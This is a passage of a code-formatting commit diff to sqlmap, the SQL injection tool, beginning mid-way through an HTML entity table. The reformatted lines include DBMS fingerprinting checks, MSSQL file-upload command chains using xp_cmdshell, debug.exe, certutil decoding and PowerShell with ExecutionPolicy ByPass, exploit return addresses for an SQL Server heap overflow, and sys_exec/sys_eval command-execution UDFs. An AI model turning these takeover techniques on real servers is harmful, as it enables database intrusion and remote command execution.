"Ntilde": 209,
"Ograve": 210,
"Oacute": 211,
"Ocirc": 212,
"Otilde": 213,
"Ouml": 214,
"times": 215,
"Oslash": 216,
"Ugrave": 217,
"Uacute": 218,
"Ucirc": 219,
"Uuml": 220,
"Yacute": 221,
"THORN": 222,
"szlig": 223,
"agrave": 224,
"aacute": 225,
"acirc": 226,
"atilde": 227,
"auml": 228,
"aring": 229,
"aelig": 230,
"ccedil": 231,
"egrave": 232,
"eacute": 233,
"ecirc": 234,
"euml": 235,
"igrave": 236,
"iacute": 237,
"icirc": 238,
"iuml": 239,
"eth": 240,
"ntilde": 241,
"ograve": 242,
"oacute": 243,
"ocirc": 244,
"otilde": 245,
"ouml": 246,
"divide": 247,
"oslash": 248,
"ugrave": 249,
"uacute": 250,
"ucirc": 251,
"uuml": 252,
"yacute": 253,
"thorn": 254,
"yuml": 255,
"OElig": 338,
"oelig": 339,
"Scaron": 352,
"fnof": 402,
"scaron": 353,
"Yuml": 376,
"circ": 710,
"tilde": 732,
"Alpha": 913,
"Beta": 914,
"Gamma": 915,
"Delta": 916,
"Epsilon": 917,
"Zeta": 918,
"Eta": 919,
"Theta": 920,
"Iota": 921,
"Kappa": 922,
"Lambda": 923,
"Mu": 924,
"Nu": 925,
"Xi": 926,
"Omicron": 927,
"Pi": 928,
"Rho": 929,
"Sigma": 931,
"Tau": 932,
"Upsilon": 933,
"Phi": 934,
"Chi": 935,
"Psi": 936,
"Omega": 937,
"alpha": 945,
"beta": 946,
"gamma": 947,
"delta": 948,
"epsilon": 949,
"zeta": 950,
"eta": 951,
"theta": 952,
"iota": 953,
"kappa": 954,
"lambda": 955,
"mu": 956,
"nu": 957,
"xi": 958,
"omicron": 959,
"pi": 960,
"rho": 961,
"sigmaf": 962,
"sigma": 963,
"tau": 964,
"upsilon": 965,
"phi": 966,
"chi": 967,
"psi": 968,
"omega": 969,
"thetasym": 977,
"upsih": 978,
"piv": 982,
"bull": 8226,
"hellip": 8230,
"prime": 8242,
"Prime": 8243,
"oline": 8254,
"frasl": 8260,
"ensp": 8194,
"emsp": 8195,
"thinsp": 8201,
"zwnj": 8204,
"zwj": 8205,
"lrm": 8206,
"rlm": 8207,
"ndash": 8211,
"mdash": 8212,
"lsquo": 8216,
"rsquo": 8217,
"sbquo": 8218,
"ldquo": 8220,
"rdquo": 8221,
"bdquo": 8222,
"dagger": 8224,
"Dagger": 8225,
"permil": 8240,
"lsaquo": 8249,
"rsaquo": 8250,
"euro": 8364,
"weierp": 8472,
"image": 8465,
"real": 8476,
"trade": 8482,
"alefsym": 8501,
"larr": 8592,
"uarr": 8593,
"rarr": 8594,
"darr": 8595,
"harr": 8596,
"crarr": 8629,
"lArr": 8656,
"uArr": 8657,
"rArr": 8658,
"dArr": 8659,
"hArr": 8660,
"forall": 8704,
"part": 8706,
"exist": 8707,
"empty": 8709,
"nabla": 8711,
"isin": 8712,
"notin": 8713,
"ni": 8715,
"prod": 8719,
"sum": 8721,
"minus": 8722,
"lowast": 8727,
"radic": 8730,
"prop": 8733,
"infin": 8734,
"ang": 8736,
"and": 8743,
"or": 8744,
"cap": 8745,
"cup": 8746,
"int": 8747,
"there4": 8756,
"sim": 8764,
"cong": 8773,
"asymp": 8776,
"ne": 8800,
"equiv": 8801,
"le": 8804,
"ge": 8805,
"sub": 8834,
"sup": 8835,
"nsub": 8836,
"sube": 8838,
"supe": 8839,
"oplus": 8853,
"otimes": 8855,
"perp": 8869,
"sdot": 8901,
"lceil": 8968,
"rceil": 8969,
"lfloor": 8970,
"rfloor": 8971,
"lang": 9001,
"rang": 9002,
"loz": 9674,
"spades": 9824,
"clubs": 9827,
"hearts": 9829,
"diams": 9830,
}

3
lib/utils/progress.py
View File

@ -62,8 +62,7 @@ class ProgressBar(object):
elif numHashes == allFull:
self._progBar = "[%s]" % ("=" * allFull)
else:
self._progBar = "[%s>%s]" % ("=" * (numHashes - 1),
" " * (allFull - numHashes))
self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes))
# Add the percentage at the beginning of the progress bar
percentString = getUnicode(percentDone) + "%"

2
lib/utils/versioncheck.py
View File

@ -20,4 +20,4 @@ except ImportError:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions))
errMsg += "most likely because current version of Python has been "
errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')"
exit(errMsg)
exit(errMsg)

2
lib/utils/xrange.py
View File

@ -69,7 +69,7 @@ class xrange(object):
if isinstance(index, slice):
start, stop, step = index.indices(self._len())
return xrange(self._index(start),
self._index(stop), step*self.step)
self._index(stop), step * self.step)
elif isinstance(index, (int, long)):
if index < 0:
fixed_index = index + self._len()

11
plugins/dbms/access/fingerprint.py
View File

@ -48,11 +48,12 @@ class Fingerprint(GenericFingerprint):
# Microsoft Access table reference updated on 01/2010
sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"),
"2000" : ("!MSysModules2", "MSysAccessObjects"),
"2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
}
"97": ("MSysModules2", "MSysAccessObjects"),
"2000": ("!MSysModules2", "MSysAccessObjects"),
"2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
}
# MSysAccessXML is not a reliable system table because it doesn't always exist
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")

1
plugins/dbms/db2/connector.py
View File

@ -37,7 +37,6 @@ class Connector(GenericConnector):
except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()

12
plugins/dbms/db2/fingerprint.py
View File

@ -64,9 +64,9 @@ class Fingerprint(GenericFingerprint):
value += DBMS.DB2
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
@ -127,12 +127,14 @@ class Fingerprint(GenericFingerprint):
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
if result:
versions = { "2003": ("5.2", (2, 1)),
versions = {
"2003": ("5.2", (2, 1)),
"2008": ("7.0", (1,)),
"2000": ("5.0", (4, 3, 2, 1)),
"7": ("6.1", (1, 0)),
"XP": ("5.1", (2, 1)),
"NT": ("4.0", (6, 5, 4, 3, 2, 1)) }
"NT": ("4.0", (6, 5, 4, 3, 2, 1))
}
# Get back-end DBMS underlying operating system version
for version, data in versions.items():

4
plugins/dbms/firebird/connector.py
View File

@ -39,8 +39,8 @@ class Connector(GenericConnector):
self.checkFileDb()
try:
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \
user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html
# Reference: http://www.daniweb.com/forums/thread248499.html
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8")
except kinterbasdb.OperationalError, msg:
raise SqlmapConnectionException(msg[1])

12
plugins/dbms/firebird/fingerprint.py
View File

@ -68,12 +68,12 @@ class Fingerprint(GenericFingerprint):
def _sysTablesCheck(self):
retVal = None
table = (
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5
)
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5
)
for i in xrange(len(table)):
version, checks = table[i]

9
plugins/dbms/hsqldb/connector.py
View File

@ -46,11 +46,8 @@ class Connector(GenericConnector):
try:
driver = 'org.hsqldb.jdbc.JDBCDriver'
connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
self.connector = jaydebeapi.connect(driver,
connection_string,
str(self.user),
str(self.password))
connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password))
except Exception, msg:
raise SqlmapConnectionException(msg[0])
@ -70,7 +67,7 @@ class Connector(GenericConnector):
try:
self.cursor.execute(query)
retVal = True
except Exception, msg: #todo fix with specific error
except Exception, msg: # TODO: fix with specific error
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
self.connector.commit()

1
plugins/dbms/informix/connector.py
View File

@ -37,7 +37,6 @@ class Connector(GenericConnector):
except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()

2
plugins/dbms/informix/syntax.py
View File

@ -41,4 +41,4 @@ class Syntax(GenericSyntax):
for _ in excluded.items():
retVal = retVal.replace(_[1], _[0])
return retVal
return retVal

6
plugins/dbms/maxdb/enumeration.py
View File

@ -108,7 +108,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
elif conf.db is not None:
if ',' in conf.db:
if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg)
@ -184,9 +184,7 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.MAXDB].columns
for tbl in tblList:
if conf.db is not None and len(kb.data.cachedColumns) > 0 \
and conf.db in kb.data.cachedColumns and tbl in \
kb.data.cachedColumns[conf.db]:
if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]:
infoMsg = "fetched tables' columns on "
infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)

6
plugins/dbms/mssqlserver/enumeration.py
View File

@ -368,16 +368,16 @@ class Enumeration(GenericEnumeration):
if foundTbl not in dbs[db]:
dbs[db][foundTbl] = {}
if colConsider == "1":
if colConsider == '1':
conf.db = db
conf.tbl = foundTbl
conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\
and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
kb.data.cachedColumns = {}
else:
dbs[db][foundTbl][column] = None

70
plugins/dbms/mssqlserver/filesystem.py
View File

@ -73,10 +73,13 @@ class Filesystem(GenericFilesystem):
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
commands = (
"cd \"%s\"" % tmpPath,
"debug < %s" % randScr,
"del /F /Q %s" % randScr
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
return chunkName
@ -195,12 +198,13 @@ class Filesystem(GenericFilesystem):
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath,
"del /F /Q \"%s\"" % randPSScriptPath)
complComm = " & ".join(command for command in commands)
commands = (
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath,
"del /F /Q \"%s\"" % randPSScriptPath
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
@ -219,10 +223,13 @@ class Filesystem(GenericFilesystem):
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
commands = (
"cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, dFileName),
"move /Y %s %s" % (dFileName, dFile)
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
@ -244,17 +251,22 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName)
complComm = " & ".join(command for command in commands)
commands = (
"cd \"%s\"" % tmpPath,
copyCmd,
"del /F /Q %s" % chunkName
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
commands = (
"cd \"%s\"" % tmpPath,
"move /Y %s %s" % (dFileName, dFile)
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
@ -330,12 +342,14 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
commands = (
"cd \"%s\"" % tmpPath,
"cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType
@ -349,7 +363,7 @@ class Filesystem(GenericFilesystem):
encodedFileContent = base64encode(wFileContent)
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
@ -357,11 +371,13 @@ class Filesystem(GenericFilesystem):
logger.debug("decoding the file to %s.." % dFile)
commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
commands = (
"cd \"%s\"" % tmpPath,
"certutil -f -decode %s %s" % (randFile, dFile),
"del /F /Q %s" % randFile
)
self.execCmd(complComm)
self.execCmd(" & ".join(command for command in commands))
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended

32
plugins/dbms/mssqlserver/fingerprint.py
View File

@ -88,12 +88,14 @@ class Fingerprint(GenericFingerprint):
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
("2005", "XACT_STATE()=XACT_STATE()"), \
("2008", "SYSDATETIME()=SYSDATETIME()"), \
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \
("2014", "CHARINDEX('12.0.2000',@@version)>0"), \
("2016", "ISJSON(NULL) IS NULL")):
for version, check in (
("2000", "HOST_NAME()=HOST_NAME()"),
("2005", "XACT_STATE()=XACT_STATE()"),
("2008", "SYSDATETIME()=SYSDATETIME()"),
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
("2014", "CHARINDEX('12.0.2000',@@version)>0"),
("2016", "ISJSON(NULL) IS NULL")
):
result = inject.checkBooleanExpression(check)
if result:
@ -136,14 +138,16 @@ class Fingerprint(GenericFingerprint):
# Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
# http://en.wikipedia.org/wiki/Windows_NT#Releases
versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
"2000": ("5.0", (4, 3, 2, 1)),
"XP": ("5.1", (3, 2, 1)),
"2003": ("5.2", (2, 1)),
"Vista or 2008": ("6.0", (2, 1)),
"7 or 2008 R2": ("6.1", (1, 0)),
"8 or 2012": ("6.2", (0,)),
"8.1 or 2012 R2": ("6.3", (0,)) }
versions = {
"NT": ("4.0", (6, 5, 4, 3, 2, 1)),
"2000": ("5.0", (4, 3, 2, 1)),
"XP": ("5.1", (3, 2, 1)),
"2003": ("5.2", (2, 1)),
"Vista or 2008": ("6.0", (2, 1)),
"7 or 2008 R2": ("6.1", (1, 0)),
"8 or 2012": ("6.2", (0,)),
"8.1 or 2012 R2": ("6.3", (0,))
}
# Get back-end DBMS underlying operating system version
for version, data in versions.items():

25
plugins/dbms/mssqlserver/takeover.py
View File

@ -20,7 +20,7 @@ class Takeover(GenericTakeover):
GenericTakeover.__init__(self)
def uncPathRequest(self):
#inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
# inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
def spHeapOverflow(self):
@ -31,21 +31,22 @@ class Takeover(GenericTakeover):
"""
returns = {
# 2003 Service Pack 0
"2003-0": (""),
# 2003 Service Pack 0
"2003-0": (""),
# 2003 Service Pack 1
"2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ),
# 2003 Service Pack 1
"2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 12/2008
#"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ),
# 2003 Service Pack 2 updated at 12/2008
# "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 05/2009
"2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 05/2009
"2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 09/2009
# "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
}
# 2003 Service Pack 2 updated at 09/2009
#"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
}
addrs = None
for versionSp, data in returns.items():

10
plugins/dbms/mysql/__init__.py
View File

@ -23,11 +23,11 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take
def __init__(self):
self.excludeDbsList = MYSQL_SYSTEM_DBS
self.sysUdfs = {
# UDF name: UDF return data-type
"sys_exec": { "return": "int" },
"sys_eval": { "return": "string" },
"sys_bineval": { "return": "int" }
}
# UDF name: UDF return data-type
"sys_exec": {"return": "int"},
"sys_eval": {"return": "string"},
"sys_bineval": {"return": "int"}
}
Syntax.__init__(self)
Fingerprint.__init__(self)

25
plugins/dbms/mysql/fingerprint.py
View File

@ -41,18 +41,19 @@ class Fingerprint(GenericFingerprint):
# Reference: https://downloads.mysql.com/archives/community/
versions = (
(32200, 32235), # MySQL 3.22
(32300, 32359), # MySQL 3.23
(40000, 40032), # MySQL 4.0
(40100, 40131), # MySQL 4.1
(50000, 50096), # MySQL 5.0
(50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4
(50500, 50554), # MySQL 5.5
(50600, 50635), # MySQL 5.6
(50700, 50717), # MySQL 5.7
(60000, 60014), # MySQL 6.0
)
(32200, 32235), # MySQL 3.22
(32300, 32359), # MySQL 3.23
(40000, 40032), # MySQL 4.0
(40100, 40131), # MySQL 4.1
(50000, 50096), # MySQL 5.0
(50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4
(50500, 50558), # MySQL 5.5
(50600, 50638), # MySQL 5.6
(50700, 50720), # MySQL 5.7
(60000, 60014), # MySQL 6.0
(80000, 80003), # MySQL 8.0
)
index = -1
for i in xrange(len(versions)):

4
plugins/dbms/mysql/takeover.py
View File

@ -67,10 +67,10 @@ class Takeover(GenericTakeover):
# On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
# On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
else:
#logger.debug("retrieving MySQL data directory absolute path")
# logger.debug("retrieving MySQL data directory absolute path")
# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir
#self.__datadir = inject.getValue("SELECT @@datadir")
# self.__datadir = inject.getValue("SELECT @@datadir")
# NOTE: specifying the relative path as './udf.dll'
# saves in @@datadir on both MySQL 4.1 and MySQL 5.0

12
plugins/dbms/postgresql/__init__.py
View File

@ -23,12 +23,12 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous,
def __init__(self):
self.excludeDbsList = PGSQL_SYSTEM_DBS
self.sysUdfs = {
# UDF name: UDF parameters' input data-type and return data-type
"sys_exec": { "input": ["text"], "return": "int4" },
"sys_eval": { "input": ["text"], "return": "text" },
"sys_bineval": { "input": ["text"], "return": "int4" },
"sys_fileread": { "input": ["text"], "return": "text" }
}
# UDF name: UDF parameters' input data-type and return data-type
"sys_exec": {"input": ["text"], "return": "int4"},
"sys_eval": {"input": ["text"], "return": "text"},
"sys_bineval": {"input": ["text"], "return": "int4"},
"sys_fileread": {"input": ["text"], "return": "text"}
}
Syntax.__init__(self)
Fingerprint.__init__(self)

2
plugins/dbms/postgresql/syntax.py
View File

@ -22,6 +22,6 @@ class Syntax(GenericSyntax):
"""
def escaper(value):
return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s)
return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s)
return Syntax._escape(expression, quote, escaper)

2
plugins/dbms/sybase/enumeration.py
View File

@ -176,7 +176,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
elif conf.db is not None:
if ',' in conf.db:
if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg)

13
plugins/generic/databases.py
View File

@ -400,7 +400,7 @@ class Databases:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.db = conf.db.upper()
if ',' in conf.db:
if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg)
@ -663,8 +663,7 @@ class Databases:
query += condQuery
elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.count % (conf.db, conf.db, \
unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query += condQuery.replace("[DB]", conf.db)
elif Backend.isDbms(DBMS.FIREBIRD):
@ -763,8 +762,7 @@ class Databases:
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
elif Backend.isDbms(DBMS.MSSQL):
